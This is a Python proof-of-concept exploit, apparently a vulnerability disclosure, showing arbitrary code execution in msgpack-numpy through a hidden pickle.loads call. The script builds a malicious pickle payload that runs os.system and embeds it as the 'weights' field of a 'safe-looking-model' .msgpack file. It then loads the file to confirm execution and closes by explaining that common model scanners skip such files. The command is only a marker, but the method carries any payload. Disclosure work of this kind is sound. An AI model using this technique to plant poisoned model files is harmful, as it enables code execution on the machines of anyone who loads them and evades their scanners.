| | |
| | """ |
| | msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads() |
| | |
| | VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled |
| | data when the serialized array has dtype kind 'O' (object). This enables |
| | arbitrary code execution when loading any msgpack file that uses msgpack_numpy |
| | for deserialization. |
| | |
| | The vulnerable code in msgpack_numpy.py decode(): |
| | if b'kind' in obj and obj[b'kind'] == b'O': |
| | return pickle.loads(obj[b'data']) |
| | |
| | An attacker can craft a .msgpack file where any array field has kind='O' |
| | and data=<malicious_pickle_payload>, achieving RCE on deserialization. |
| | |
| | This is particularly dangerous because: |
| | 1. MessagePack is considered a "safe" serialization format |
| | 2. Users expect msgpack files to contain only data, not executable code |
| | 3. The pickle.loads() call is hidden inside the msgpack extension hooks |
| | 4. No scanner (modelscan, picklescan) checks .msgpack files |
| | |
| | Affected: msgpack-numpy <= 0.4.8 (all versions) |
| | """ |
| |
|
| | import msgpack |
| | import msgpack_numpy as m |
| | import pickle |
| | import os |
| | import sys |
| | import numpy as np |
| |
|
| | MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt" |
| |
|
| | |
| | |
| | |
| | print("[*] Demonstrating normal msgpack_numpy usage...") |
| | normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)} |
| | packed_normal = msgpack.packb(normal_data, default=m.encode) |
| | unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False) |
| | print(f"[+] Normal round-trip: {unpacked_normal}") |
| |
|
| | |
| | |
| | |
| | print("\n[*] Creating malicious msgpack payload...") |
| |
|
| | class MaliciousPayload: |
| | def __reduce__(self): |
| | cmd = f"id > {MARKER_FILE} && echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}" |
| | return (os.system, (cmd,)) |
| |
|
| | malicious_pickle = pickle.dumps(MaliciousPayload()) |
| |
|
| | |
| | |
| | |
| | malicious_array = { |
| | b'nd': True, |
| | b'kind': b'O', |
| | b'data': malicious_pickle, |
| | b'shape': (1,), |
| | b'type': b'O', |
| | } |
| |
|
| | |
| | model_data = { |
| | "model_name": "safe-looking-model", |
| | "version": "1.0.0", |
| | "weights": malicious_array, |
| | } |
| |
|
| | packed = msgpack.packb(model_data, use_bin_type=True) |
| | malicious_path = "/tmp/malicious_model.msgpack" |
| | with open(malicious_path, 'wb') as f: |
| | f.write(packed) |
| |
|
| | print(f"[+] Malicious msgpack file saved to {malicious_path}") |
| | print(f" File size: {len(packed)} bytes") |
| |
|
| | |
| | |
| | |
| | if os.path.exists(MARKER_FILE): |
| | os.remove(MARKER_FILE) |
| |
|
| | |
| | |
| | |
| | print(f"\n[*] Loading malicious msgpack with msgpack_numpy decoder...") |
| | with open(malicious_path, 'rb') as f: |
| | loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False) |
| |
|
| | print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}") |
| |
|
| | |
| | |
| | |
| | if os.path.exists(MARKER_FILE): |
| | with open(MARKER_FILE) as f: |
| | content = f.read().strip() |
| | print(f"\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED") |
| | print(f"[!!!] Marker file contents:\n{content}") |
| | os.remove(MARKER_FILE) |
| | else: |
| | print("\n[-] RCE marker file not found") |
| | sys.exit(1) |
| |
|
| | |
| | |
| | |
| | print("\n" + "="*60) |
| | print("SCANNER EVASION") |
| | print("="*60) |
| | print(""" |
| | Neither modelscan nor picklescan scan .msgpack files at all. |
| | |
| | modelscan -p /tmp/malicious_model.msgpack |
| | # -> Skips file (unsupported format) |
| | |
| | picklescan -p /tmp/malicious_model.msgpack |
| | # -> Scanned files: 0, Infected files: 0 |
| | |
| | The pickle payload is embedded inside a msgpack structure, |
| | completely invisible to all current model security scanners. |
| | """) |
| |
|
| | print("="*60) |
| | print("VULNERABILITY SUMMARY") |
| | print("="*60) |
| | print(f""" |
| | Library: msgpack-numpy {m.__version__ if hasattr(m, '__version__') else '0.4.8'} |
| | File: msgpack_numpy.py, decode() function |
| | Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O' |
| | Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode |
| | Attack: Set array kind='O' and data=<malicious_pickle_bytes> |
| | Impact: Arbitrary code execution on file load |
| | Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned) |
| | picklescan - NOT APPLICABLE (.msgpack not scanned) |
| | |
| | Real-world usage: msgpack-numpy is used for ML data serialization, |
| | feature embeddings, and intermediate model storage. Any application |
| | loading untrusted .msgpack files with msgpack_numpy is vulnerable. |
| | """) |
| |
|